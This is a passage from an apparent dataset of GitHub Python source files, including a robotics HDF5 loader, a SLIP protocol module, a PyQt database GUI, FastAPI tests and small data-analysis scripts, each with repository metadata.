self._hparams['img_size']\n image = self._hf['env']['image']\n old_dims = self._hf['env']['image'].attrs['shape'][:2]\n old_height, old_width = old_dims\n target_height, target_width = target_dims\n resize_method = cv2.INTER_CUBIC\n if target_height * target_width < old_height * old_width:\n resize_method = cv2.INTER_AREA\n image = cv2.imdecode(image[:], cv2.IMREAD_COLOR)\n return cv2.resize(image, (target_width, target_height), interpolation=resize_method)[:, :, ::-1]\n\n def _add_finger_sensor(self, ret_state):\n if self._hparams['load_finger_sensors']:\n finger_sensors = self._hf['env']['finger_sensors'][:]\n return np.concatenate((ret_state, finger_sensors), -1)\n return ret_state\n\n def load_states(self):\n if len(self._hf['env']['state'].shape) == 1: # single time-step mode\n return self._hf['env']['state'][:]\n\n s_T, sdim = self._file_metadata 
['state_T'], self._file_metadata ['sdim']\n if self._hparams['target_sdim'] == sdim:\n return self._add_finger_sensor(self._hf['env']['state'][:])\n\n elif sdim < self._hparams['target_sdim'] and self._hparams['state_mismatch'] & STATE_MISMATCH.PAD_ZERO:\n pad = np.zeros((s_T, self._hparams['target_sdim'] - sdim), dtype=np.float32)\n return self._add_finger_sensor(np.concatenate((self._hf['env']['state'][:], pad), axis=-1))\n\n elif sdim > self._hparams['target_sdim'] and self._hparams['state_mismatch'] & STATE_MISMATCH.CLEAVE:\n return self._add_finger_sensor(self._hf['env']['state'][:][:, :self._hparams['target_sdim']])\n\n else:\n raise ValueError(\"file sdim - {}, target sdim - {}, pad behavior - {}\".format(sdim, self._hparams['target_sdim'], self._hparams['state_mismatch']))\n\n def load_actions(self):\n if len(self._hf['policy']['actions'].shape) == 1: # single time-step mode\n return self._hf['policy']['actions'][:]\n\n a_T, adim = self._file_metadata['action_T'], self._file_metadata['adim']\n if self._hparams['target_adim'] == adim:\n return self._hf['policy']['actions'][:]\n\n elif self._hparams['target_adim'] == adim + 1 and self._hparams['impute_autograsp_action'] and self._file_metadata ['primitives'] == 'autograsp':\n action_append, old_actions = np.zeros((a_T, 1)), self._hf['policy']['actions'][:]\n next_state = self._hf['env']['state'][:][1:, -1]\n \n high_val, low_val = self._file_metadata['high_bound'][-1], self._file_metadata['low_bound'][-1]\n midpoint = (high_val + low_val) / 2.0\n\n for t, s in enumerate(next_state):\n if s > midpoint:\n action_append[t, 0] = high_val\n else:\n action_append[t, 0] = low_val\n return np.concatenate((old_actions, action_append), axis=-1)\n\n elif adim < self._hparams['target_adim'] and self._hparams['action_mismatch'] & ACTION_MISMATCH.PAD_ZERO:\n pad = np.zeros((a_T, self._hparams['target_adim'] - adim), dtype=np.float32)\n return np.concatenate((self._hf['policy']['actions'][:], pad), axis=-1)\n\n elif adim > self._hparams['target_adim'] and self._hparams['action_mismatch'] & ACTION_MISMATCH.CLEAVE:\n return self._hf['policy']['actions'][:][:, :self._hparams['target_adim']]\n\n else:\n raise ValueError(\"file adim - {}, target adim - {}, pad behavior - {}\".format(adim, self._hparams['target_adim'], self._hparams['action_mismatch']))\n\n def load_robot_id(self, robotname_list):\n robotname2id = {n: i for i, n in enumerate(robotname_list)}\n return robotname2id[self._file_metadata['robot']]\n\n def close(self):\n self._hf.close()\n self._hf = None\n \n @staticmethod\n def default_hparams():\n return {\n 'target_adim': 4,\n 'target_sdim': 5,\n 'state_mismatch': STATE_MISMATCH.ERROR, # TODO make better flag parsing\n 'action_mismatch': ACTION_MISMATCH.ERROR, # TODO make better flag parsing\n 'img_size': [48, 64],\n 'impute_autograsp_action': True,\n 'load_finger_sensors': False,\n }\n\n @property\n def hf(self):\n return self._hf\n\n# def load_data(f_name, file_metadata, hparams, rng=None):\n# rng = random.Random(rng)\n# assert os.path.exists(f_name) and os.path.isfile(f_name), \"invalid f_name\"\n\n# with open(f_name, 'rb') as f:\n# buf = f.read()\n# assert hashlib.sha256(buf).hexdigest() == file_metadata['sha256'], \"file hash doesn't match meta-data. 
maybe delete pkl and re-generate?\"\n\n# with h5py.File(io.BytesIO(buf), 'r') as hf:\n# start_time, n_states = 0, min([file_metadata['state_T'], file_metadata['img_T'], file_metadata['action_T'] + 1])\n# assert n_states > 1, \"must be more than one state in loaded tensor!\"\n# if 1 < hparams['load_T'] < n_states:\n# start_time = rng.randint(0, n_states - hparams['load_T'])\n# n_states = hparams['load_T']\n\n# assert all([0 <= i < file_metadata['ncam'] for i in hparams['cams_to_load']]), \"cams_to_load out of bounds!\"\n# images = [load_camera_imgs(c, hf, file_metadata, hparams['img_size'], start_time, n_states)[None] for c in hparams['cams_to_load']]\n# images = np.swapaxes(np.concatenate(images, 0), 0, 1)\n# images = np.transpose(images, (0, 1, 4, 2, 3))\n# actions = load_actions(hf, file_metadata, hparams).astype(np.float32)[start_time:start_time + n_states-1]\n# full_state = load_states(hf, file_metadata, hparams).astype(np.float32)\n# states = full_state[start_time:start_time + n_states]\n\n# if hparams['load_finger_sensors']:\n# finger_sensors = hf['env']['finger_sensors'][:][start_time:start_time + n_states].astype(np.float32).reshape((-1, 1))\n# states = np.concatenate((states, finger_sensors), -1)\n\n# if hparams['load_reward']:\n# assert 1 >= hparams['reward_discount'] >= 0, 'invalid reward discount'\n# finger_sensors = hf['env']['finger_sensors'][:].reshape((-1, 1))\n# good_states = np.logical_and(full_state[1:, 2] >= 0.9, full_state[1:, -1] > 0)\n# good_states = np.logical_and(finger_sensors[1:, 0] > 0, good_states).astype(np.float32)\n# reward_table = good_states - (1 - good_states) * 0.02\n# rewards = []\n\n# for s_t in range(start_time, start_time + n_states - 1):\n# reward_slice = reward_table[s_t:]\n# discount = np.power(hparams['reward_discount'], np.arange(reward_slice.shape[0]))\n# rewards.append(np.sum(discount * reward_slice))\n# return images, actions, states, np.array(rewards).astype(np.float32)\n \n# if hparams['load_annotations']:\n# annotations = load_annotations(hf, file_metadata, hparams, hparams['cams_to_load'])[start_time:start_time + n_states]\n# return images, actions, states, annotations\n\n# return images, actions, states\n\n\nif __name__ == '__main__':\n import argparse\n from robonet.datasets import load_metadata\n import random\n import matplotlib.pyplot as plt\n import os\n\n parser = argparse.ArgumentParser(description=\"tests hdf5 data loader without tensorflow dataset wrapper\")\n parser.add_argument('file', type=str, help=\"path to hdf5 you want to load\")\n args = parser.parse_args()\n args.file = os.path.expanduser(args.file)\n \n assert 'hdf5' in args.file\n data_folder = os.path.dirname(args.file)\n meta_data = load_metadata(data_folder)\n hparams = HDF5Loader.default_hparams()\n\n file_handle = HDF5Loader(args.file, meta_data.get_file_metadata(args.file), hparams)\n import pdb; pdb.set_trace()\n print(file_handle)\n","repo_name":"Asap7772/widowx_control","sub_path":"widowx_envs/widowx_envs/utils/datautils/hdf5_loader.py","file_name":"hdf5_loader.py","file_ext":"py","file_size_in_byte":11820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25977091882","text":"import os\nimport re\n\n\ndef validate_env_values():\n data = dict(USER_THRESHOLD=os.getenv('USER_THRESHOLD'),\n ADMINISTRATOR_GROUP_ID=os.getenv('ADMINISTRATOR_GROUP_ID'),\n USERS_GROUP=os.getenv('USERS_GROUP'))\n\n pattern = r'[-+]?\\d+$'\n for key, value in data.items():\n if not value:\n exit(f'Значение {key} не 
установлено!')\n if not re.match(pattern, value):\n exit(f'{key} не целое число!')\n\n counter, admins, users = data.values()\n return int(counter), [int(admins)], [int(users)]\n","repo_name":"chip-chu/tg-bot-users","sub_path":"utils/validate_values.py","file_name":"validate_values.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"28346481451","text":"import pandas as pd\n\nfrom ayniy.utils import FeatureStore, Data\n\n\nif __name__ == '__main__':\n\n target_col = 'diabetes_mellitus'\n\n features = FeatureStore(\n feature_names=[\n '../input/feather/train_test.ftr',\n '../input/feather/count_null.ftr',\n '../input/feather/count_encoding.ftr',\n \"../input/feather/count_encoding_interact.ftr\",\n \"../input/feather/aggregation.ftr\",\n \"../input/feather/target_encoding.ftr\",\n ],\n target_col=target_col,\n )\n\n X_train_u = features.X_train\n y_train = features.y_train\n X_test_u = features.X_test\n\n fe_id_u = 'fe006'\n run_id = 'run021'\n N_FEATURES = 300\n\n X_train_u = Data.load(f'../input/pickle/X_train_{fe_id_u}.pkl')\n X_test_u = Data.load(f'../input/pickle/X_test_{fe_id_u}.pkl')\n fi = pd.read_csv(f'../output/importance/{run_id}-fi.csv')['Feature'][:N_FEATURES]\n X_train_u = X_train_u[fi]\n X_test_u = X_test_u[fi].reset_index(drop=True)\n X_train_u.columns = [f'u_{c}' for c in fi]\n X_test_u.columns = [f'u_{c}' for c in fi]\n\n fe_id = 'fe_siavrez'\n X_train = Data.load(f'../input/pickle/X_train_{fe_id}.pkl')\n X_test = Data.load(f'../input/pickle/X_test_{fe_id}.pkl')\n\n print(X_train.shape, X_train_u.shape)\n print(X_test.shape, X_test_u.shape)\n\n X_train = pd.concat([X_train, X_train_u], axis=1)\n X_test = pd.concat([X_test, X_test_u], axis=1)\n print(X_train.shape, X_test.shape)\n\n print(X_train.select_dtypes('category').columns)\n\n fe_name = 'fe009'\n Data.dump(X_train, f'../input/pickle/X_train_{fe_name}.pkl')\n Data.dump(X_test, f'../input/pickle/X_test_{fe_name}.pkl')\n Data.dump(y_train, f'../input/pickle/y_train_{fe_name}.pkl')\n","repo_name":"upura/widsdatathon2021","sub_path":"experiments/concat_files.py","file_name":"concat_files.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39813599061","text":"'''\n238. 
Product of Array Except Self\nLink: https://leetcode.com/problems/product-of-array-except-self/\n\nGiven an array nums of n integers where n > 1,\nreturn an array output such that output[i] is equal to\nthe product of all the elements of nums except nums[i].\n\nExample:\nInput: [1, 2, 3, 4]\nOutput: [24, 12, 8, 6]\n\nNote: Please solve it without division and in O(n).\n'''\n\n\ndef product_except_self(nums):\n ''' \n [Intuition]\n nums - [1, 2, 3, 4]\n\n left - [1, 1, 2, 6]\n right - [24, 12, 4, 1]\n\n Output: [24, 12, 8, 6]\n '''\n\n n = len(nums)\n\n left_products, right_products = [1] * n, [1] * n\n output = [1] * n\n\n # Get the products before the current index\n for i in range(1, n):\n left_products[i] = nums[i-1] * left_products[i-1]\n\n # Get the products after the current index\n for i in range(n-2, -1, -1):\n right_products[i] = nums[i+1] * right_products[i+1]\n\n # Multiply the multiples\n for i in range(n):\n output[i] = left_products[i] * right_products[i]\n\n return output\n\n\ndef product_except_self_v2(nums):\n n = len(nums)\n output = [1] * n\n\n for i in range(1, n):\n output[i] = nums[i-1] * output[i-1]\n\n right_product = 1\n\n for i in range(n-1, -1, -1):\n output[i] = output[i] * right_product\n right_product = right_product * nums[i]\n\n return output\n\n\nassert product_except_self([1, 2, 3, 4]) == [24, 12, 8, 6]\n","repo_name":"ErickMwazonga/sifu","sub_path":"arrays/general/products_except_self.py","file_name":"products_except_self.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"12197427000","text":"import CRC16CCITT\n\nSLIP_FRAME_START_CB = [0xFF, 0xFF, 0xFF, 0xFF, 0xFF]\nSLIP_FRAME_END = 0xC0\nSLIP_ESC = 0xDB\nSLIP_CUSTOM = 0x5A\nSLIP_ESC_START = 0xDE\nSLIP_ESC_END = 0xDC\nSLIP_ESC_ESC = 0xDD\nSLIP_ESC_CUSTOM = 0xDA\n\nSLIP_SMALLEST_ENCODE = 2\n\ns_esc =SLIP_ESC\ns_escEsc = [SLIP_ESC, SLIP_ESC_ESC]\ns_frameStart = SLIP_FRAME_START_CB\ns_escStart = [SLIP_ESC, SLIP_ESC_START]\ns_frameEnd = SLIP_FRAME_END\ns_escEnd = [SLIP_ESC, SLIP_ESC_END]\ns_custom = SLIP_CUSTOM\ns_escCustom = [SLIP_ESC, SLIP_ESC_CUSTOM]\n\n\ndef ReplaceEn_SlipProtocol(source_list, find_item, replace_list):\n dest_list=[]\n for i in range(0,len(source_list)):\n if(source_list[i] == find_item):\n dest_list.extend(replace_list)\n else:\n dest_list.append(source_list[i])\n return dest_list\n\n\ndef ReplaceDe_SlipProtocol(source_list, find_item, replace_list):\n dest_list=[]\n j = len(source_list)\n for i in range(0,len(source_list)):\n if i == j:\n pass\n elif(source_list[i] == find_item[0] and source_list[i+1] == find_item[1]):\n dest_list.append(replace_list)\n j = i+1\n else:\n dest_list.append(source_list[i])\n return dest_list\n\n\ndef Encode_SlipProtocol(to_encode_list):\n dest_list = SLIP_FRAME_START_CB[:]\n dest_list.extend(to_encode_list)\n return dest_list\n\n\ndef Decode_SlipProtocol(to_decode_list):\n ret_val = 0\n data_list = []\n dest_list = to_decode_list[:]\n checksum_received = dest_list.pop(-1)\n # Calculate XOR checksum for received data\n checksum_calc = 0x00\n # check the checksum for received data\n for value in dest_list:\n checksum_calc = checksum_calc ^ value\n if checksum_received == checksum_calc:\n # check the response code\n if dest_list[8] != 0x00:\n ret_val = 0x10\n data_list = dest_list[10:]\n else:\n data_list = []\n ret_val = 0x01\n return ret_val\n return ret_val, data_list\n\ndef Decode_FE_CommProtocol(to_decode_list):\n ret_val = 0\n data_list = []\n 
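The escape tables at the top of SlipProtocol.py implement classic SLIP byte-stuffing. As a hedged standalone sketch (not this module's exact API), stuffing replaces any payload byte that collides with a framing byte by a two-byte escape sequence, so a bare 0xC0 on the wire can only ever mean end-of-frame:

def stuff(payload):
    # byte values taken from the SLIP_* constants defined above
    out = []
    for b in payload:
        if b == 0xC0:        # SLIP_FRAME_END -> SLIP_ESC, SLIP_ESC_END
            out += [0xDB, 0xDC]
        elif b == 0xDB:      # SLIP_ESC -> SLIP_ESC, SLIP_ESC_ESC
            out += [0xDB, 0xDD]
        else:
            out.append(b)
    return out

print([hex(b) for b in stuff([0x01, 0xC0, 0xDB])])  # ['0x1', '0xdb', '0xdc', '0xdb', '0xdd']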
dest_list = to_decode_list[:]\r\n    crc_high_received = dest_list.pop(-1)\r\n    crc_low_received = dest_list.pop(-1)\r\n    # Calculate CRC16-CCITT checksum for received data\r\n    crc16_calcu = CRC16CCITT.CRC16_CCITT(dest_list)\r\n    crc16_low = crc16_calcu & 0x00FF\r\n    crc16_high = crc16_calcu >> 8\r\n\r\n    # check the checksum for received data\r\n    if crc16_low == crc_low_received and crc16_high == crc_high_received:\r\n        ret_val = dest_list[4:6]\r\n        data_list = dest_list[6:]\r\n    else:\r\n        data_list = []\r\n        # 0x0001 indicates that the CRC check failed\r\n        ret_val = 0x0001\r\n        return ret_val\r\n    return ret_val, data_list\r\n\r\n# list1=[0,0,0,0,0xc0,0x84]\r\n# list2=Encode_SlipProtocol(list1)\r\n# print(list2)\r\n# list2 = [223,219, 220, 4, 2, 0, 198, 141,192]\r\n# list3=Decode_SlipProtocol(list2)\r\n# print(list3)","repo_name":"ppanzhang/service-tool","sub_path":"SlipProtocol.py","file_name":"SlipProtocol.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8567565121","text":"\n
import os, platform, logging\n\n# GUI modules\nimport sys\nimport main_window\nimport buyer_window\nfrom PyQt5 import QtWidgets, uic, QtCore, QtGui\n# GUI modules\n\n# database modules\nimport DataManager\n# database modules\n\n\nclass BuyerWindow():\n    '''GUI class for a single buyer'''\n    def __init__(self, dat_manager, buyer_id):\n        '''\n        :param: dat_manager database manager class\n        :param: buyer_id the buyer's id\n        '''\n        self.buyer_id = buyer_id\n\n\n        logging.debug(\"Opening the buyer details screen\")\n        self.dat_manager = DataManager.DataManager()\n\n        self.setupUi(self)\n\n        # Override the class constructor\ndef disconnect(signal):\n    try:\n        signal.disconnect()\n    except TypeError:\n        pass\n\n\nclass MainWindow(QtWidgets.QMainWindow, main_window.Ui_MainWindow):\n\n    class CurrentView:\n        BUYERS = 12323\n    def __init__(self):\n        # The superclass constructor must be called\n        QtWidgets.QMainWindow.__init__(self)\n\n        logging.debug(\"Connecting to the database\")\n        self.dat_manager = DataManager.DataManager()\n\n        self.setupUi(self)\n\n        self.current_view = None\n        self.tableWidget_load_buyers()\n\n    def open_buyer_win(self, row, column):\n        id_buyers = self.tableWidget.item(row,0).text()\n        buyer_win = BuyerWindow(self.dat_manager, id_buyers)\n        buyer_win.show()\n        buyer_win.setParent(self)\n\n\n\n\n    def tableWidget_load_buyers(self, filters = None):\n        '''Loads user data into the table, with or without a filter'''\n\n        buyers = self.dat_manager.get_buyers(filters)\n        if not self.current_view == MainWindow.CurrentView.BUYERS:\n            disconnect(self.tableWidget.cellActivated)\n            disconnect(self.lineEdit_filter.textChanged)\n            disconnect(self.comboBox_filter.currentIndexChanged)\n\n            self.tableWidget.setColumnCount(5)\n\n\n            self.tableWidget.setHorizontalHeaderLabels([\"id\",\"name\",\"email\",\"address\", \"phone\"])\n            self.tableWidget.setColumnWidth(0, 40)\n            self.tableWidget.setColumnWidth(1, 200)\n            self.tableWidget.setColumnWidth(2, 200)\n            self.tableWidget.setColumnWidth(3, 200)\n            self.tableWidget.setColumnWidth(4, 140)\n\n            # set up the comboBox\n            self.comboBox_filter.clear()\n            self.comboBox_filter.addItems((\"id\",\"name\",\"email\",\"address\", \"phone\"))\n\n            self.tableWidget.cellActivated.connect(self.open_buyer_win)\n            self.lineEdit_filter.textChanged.connect(self.filter)\n            self.comboBox_filter.currentIndexChanged.connect(self.filter)\n\n\n            self.current_view = MainWindow.CurrentView.BUYERS\n\n        self.tableWidget.clear()\n        self.tableWidget.setRowCount(len(buyers))\n        for row, buyer in enumerate(buyers):\n            self.tableWidget.setItem(row, 0, QtWidgets.QTableWidgetItem(str(buyer.id)))\n            self.tableWidget.setItem(row, 1, QtWidgets.QTableWidgetItem(buyer.name))\n            self.tableWidget.setItem(row, 2, QtWidgets.QTableWidgetItem(buyer.email))\n            self.tableWidget.setItem(row, 3, QtWidgets.QTableWidgetItem(buyer.address))\n            self.tableWidget.setItem(row, 4, QtWidgets.QTableWidgetItem(\", \".join(buyer.phones)))\n\n    def filter(self):\n        text_filter = self.lineEdit_filter.text()\n        if text_filter == \"\":\n            self.tableWidget_load_buyers()\n        else:\n            if self.current_view is MainWindow.CurrentView.BUYERS:\n                column = self.comboBox_filter.currentText()\n                self.tableWidget_load_buyers((column, text_filter))\n\n\n\n\ndef main():\n\n    if platform.platform().startswith('Windows'): # decide where to save the logs\n\n        logging_file = os.path.join(os.getenv('HOMEDRIVE'),os.getenv('HOMEPATH'), 'DMS.log')\n    else:\n        logging_file = os.path.join(os.getenv('HOME'), 'DMS.log')\n\n    logging.basicConfig( # settings for the logging module\n        level=logging.DEBUG,\n        format='%(asctime)s : %(levelname)s : %(message)s',\n        filename=logging_file,\n        filemode='w',\n    )\n    logging.debug(\"application start\")\n\n    app = QtWidgets.QApplication(sys.argv)\n\n    w = MainWindow()\n    w.show()\n\n    sys.exit(app.exec_())\n\n\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Daniil-PD/Database_management_system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28562318984","text":"#!/usr/bin/env python3\nfrom pprint import pprint\nimport sys\nimport fileinput\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom xboomx.sqlitemgr import get_session, PathItem\n\n\ndef main():\n    # get db type\n    db_type = ''\n    if len(sys.argv) > 1 and sys.argv[1] != \"--stats\":\n        db_type = sys.argv[1]\n\n    try:\n        item = fileinput.input()[0]\n        pprint(item)\n\n        item = item.strip('\\n')\n\n        session = get_session()\n        try:\n            dbitem = session.query(PathItem).filter_by(name=item).one()\n            dbitem.count = dbitem.count + 1\n            session.add(dbitem)\n        except NoResultFound:\n            dbi = PathItem(name=item, count=0)\n            session.add(dbi)\n\n        session.commit()\n        session.close()\n\n        print(item)\n    except IndexError:\n        # handle if one presses Esc to exit dmenu, catch broken pipe\n        exit(0)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"victorhaggqvist/xboomx","sub_path":"xboomx/bin/xboomx_update.py","file_name":"xboomx_update.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7958132261","text":"from fastapi.testclient import TestClient\nimport pytest\nfrom databases import Database\nfrom sqlalchemy import MetaData, Table, Column, String, create_engine, Integer\nfrom fastapi import status\n\nfrom main import flow_aggregation_app\nfrom app.settings import get_config, Config\nfrom app.settings import config\n\nfrom app.persistent_backend.database import get_db, get_raw_flow_events\n\nDATABASE_URL = config.test_database_url\n\ndatabase = None\nraw_flow_events = None\n\nclient = TestClient(flow_aggregation_app)\n\nPOST_URL_ENDPOINT = \"/flows\"\nGET_URL_ENDPOINT = \"/flows\"\n\ndatabase = Database(DATABASE_URL, force_rollback=True)\nmetadata = MetaData()\n\nraw_flow_events = Table(\n    \"raw_flow_events\",\n    metadata,\n    Column(\"src_app\", String),\n    Column(\"dest_app\", String),\n    Column(\"vpc_id\", String),\n    Column(\"hour\", String),\n    
Column(\"bytes_rx\", Integer),\n Column(\"bytes_tx\", Integer)\n)\n\n\n@pytest.fixture()\ndef create_test_database():\n engine = create_engine(\n DATABASE_URL, connect_args={\"check_same_thread\": False}\n )\n\n metadata.create_all(bind=engine)\n\n # Run the test suite\n yield\n\n # Drop test databases\n metadata.drop_all(engine)\n\n\ndef override_get_db():\n return database\n\n\ndef override_get_table():\n return raw_flow_events\n\n\nflow_aggregation_app.dependency_overrides[get_db] = override_get_db\nflow_aggregation_app.dependency_overrides[get_raw_flow_events] = override_get_table\n\n\n@pytest.fixture()\ndef setup_values_in_test_db(create_test_database):\n json_items = [\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, \"bytes_rx\": 300, \"hour\": 1},\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 200, \"bytes_rx\": 600, \"hour\": 1},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 1},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2}\n ]\n client.post(\n POST_URL_ENDPOINT,\n json=json_items,\n )\n\n\ndef test_get_flows(create_test_database, setup_values_in_test_db):\n expected_responses = {\n 'hour_1': [\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-0\", \"hour\": 1, \"bytes_rx\": 500, \"bytes_tx\": 100},\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"hour\": 1, \"bytes_rx\": 900, \"bytes_tx\": 300}],\n 'hour_2': [\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-0\", \"hour\": 2, \"bytes_rx\": 500, \"bytes_tx\": 100},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"hour\": 2, \"bytes_rx\": 500, \"bytes_tx\": 100}],\n 'hour_3': []\n }\n\n # testing get responses\n response_hour_1 = client.get(GET_URL_ENDPOINT + \"?hour=1\")\n data_hour_1 = response_hour_1.json()\n\n assert response_hour_1.status_code == 200\n assert len(data_hour_1['items']) == 2\n assert data_hour_1['items'] == expected_responses['hour_1']\n\n response_hour_2 = client.get(GET_URL_ENDPOINT + \"?hour=2\")\n data_hour_2 = response_hour_2.json()\n\n assert response_hour_2.status_code == 200\n assert len(data_hour_2['items']) == 2\n assert data_hour_2['items'] == expected_responses['hour_2']\n\n response_hour_3 = client.get(GET_URL_ENDPOINT + \"?hour=3\")\n data_hour_3 = response_hour_3.json()\n\n assert response_hour_3.status_code == 200\n assert len(data_hour_3['items']) == 0\n assert data_hour_3['items'] == expected_responses['hour_3']\n\n # testing input query parameters\n res = client.get(GET_URL_ENDPOINT + \"?hour=five\")\n assert res.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY\n\n res = client.get(GET_URL_ENDPOINT + \"?hour\")\n assert res.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY\n\n\ndef test_unsupported_http_methods():\n response_put_method = client.put(POST_URL_ENDPOINT, json={})\n assert response_put_method.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n\n response_delete_method = client.delete(POST_URL_ENDPOINT, json={})\n assert response_delete_method.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n\n\ndef test_post_flows_request(create_test_database):\n json_items = [\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, 
\"bytes_rx\": 300, \"hour\": 1},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2}\n ]\n response = client.post(\n POST_URL_ENDPOINT,\n json=json_items,\n )\n assert response.status_code == status.HTTP_201_CREATED\n\n\ndef override_get_config():\n return Config(total_input_flow_events=1)\n\n\ndef test_post_flows_request_exception(create_test_database):\n flow_aggregation_app.dependency_overrides[get_config] = override_get_config\n json_items = [\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2},\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, \"bytes_rx\": 300, \"hour\": 1},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2}\n ]\n response = client.post(\n POST_URL_ENDPOINT,\n json=json_items,\n )\n assert response.status_code == 500\n assert response.json() == {'error_message': 'Too many flow objects are being registered', 'status_code': 406}\n\n flow_aggregation_app.dependency_overrides[get_config] = get_config","repo_name":"uthiramohan/aggregation_ws","sub_path":"tests/test_application.py","file_name":"test_application.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39373329447","text":"import csv\nimport numpy as np\nimport matplotlib\nfrom matplotlib.font_manager import FontProperties\nimport matplotlib.pyplot as plt\nimport six\nlist1 = []\nwith open('loan_data.csv') as loanData:\n reader1 = csv.reader(loanData)\n for column in loanData:\n list1.append([column.split(',')[0], column.split(',')[1]])\nlist1 = list1[1:]\nlist2 = []\nwith open('home_ownership_data.csv') as hoData:\n reader2 = csv.reader(hoData)\n for row in hoData:\n list2.append([row.split(',')[0], row.split(',')[1].rstrip()])\nlist2 = list2[1:]\nlist3 = []\nfor i in range(len(list1)):\n for j in range(len(list2)):\n if list1[i][0] == list2[j][0]:\n list3.append([list2[j][1], list1[i][1]])\nlistM = []\nlistO = []\nlistR = []\nfor z in range(len(list3)):\n if list3[z][0] == 'MORTGAGE':\n listM.append(list3[z][1])\n if list3[z][0] == 'OWN':\n listO.append(list3[z][1])\n if list3[z][0] == 'RENT':\n listR.append(list3[z][1])\nMortgage = 0\nRent = 0\nOwn = 0\nfor a in range(len(listM)):\n Mortgage = Mortgage+int(listM[a])\nfor b in range(len(listO)):\n Own = Own+int(listO[b])\nfor c in range(len(listR)):\n Rent = Rent+int(listR[c])\nMortgage = round(float(Mortgage)/len(listM),6)\nOwn = round(float(Own)/len(listO),6)\nRent = round(float(Rent)/len(listR),6)\nName = ['MORTGAGE', 'OWN', 'RENT']\nAverage = [Mortgage, Own, Rent]\nAll = [[0, 'MORTGAGE', Mortgage],[1,'OWN', Own], [2, 'RENT', Rent]]\nAll = np.array(All)\nfig, plt = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1,3]},figsize=(15,6))\nplt[1].bar(Name, Average, align='center', width=0.62)\nplt[1].set_title('Average loan amounts per home ownership')\nplt[1].set_xlabel('Home ownership')\nplt[1].set_ylabel('Average loan amount($)')\nplt[0].axis('off')\nplt[0].axis([0, 3, All.shape[0], -6])\ntable1 = plt[0].table(cellText=All, cellColours=[['#F0F0F0', '#F0F0F0', '#F0F0F0'], ['#FFFFFF', '#FFFFFF', '#FFFFFF'],\n ['#F0F0F0', '#F0F0F0', '#F0F0F0']],\n colLabels=['', 'home_ownership', 'loan_amnt'], loc='bottom', colWidths=[0.05, 0.4, 0.4], bbox=[0.0, 0.0, 1.0, 
0.3])\ntable1.auto_set_font_size(False)\ntable1.set_fontsize(12.5)\nfor k, cell in six.iteritems(table1._cells):\n cell.set_edgecolor('none')\n cell.set_text_props(fontproperties=FontProperties(family='Arial'))\n if k[0] == 0:\n table1._cells[k]._loc='right'\n cell.set_text_props(fontproperties=FontProperties(weight='bold', family='Arial'))\n if k[1] == 0:\n cell.set_text_props(fontproperties=FontProperties(weight='bold', family='Arial'))\nplt[0].axhline(y=1, color='k')\nfig.show()","repo_name":"RitaWang0427/Rep01","sub_path":"MAIS202.py","file_name":"MAIS202.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3124350123","text":"from bottle import route, default_app, HTTPResponse, run, jinja2_view, url, get, post, request, html_escape,\\\n response, redirect, debug, jinja2_template, MultiDict, post\nfrom pony.orm import Database, Optional, Required, PrimaryKey, db_session, sql_debug, select\nimport matplotlib as 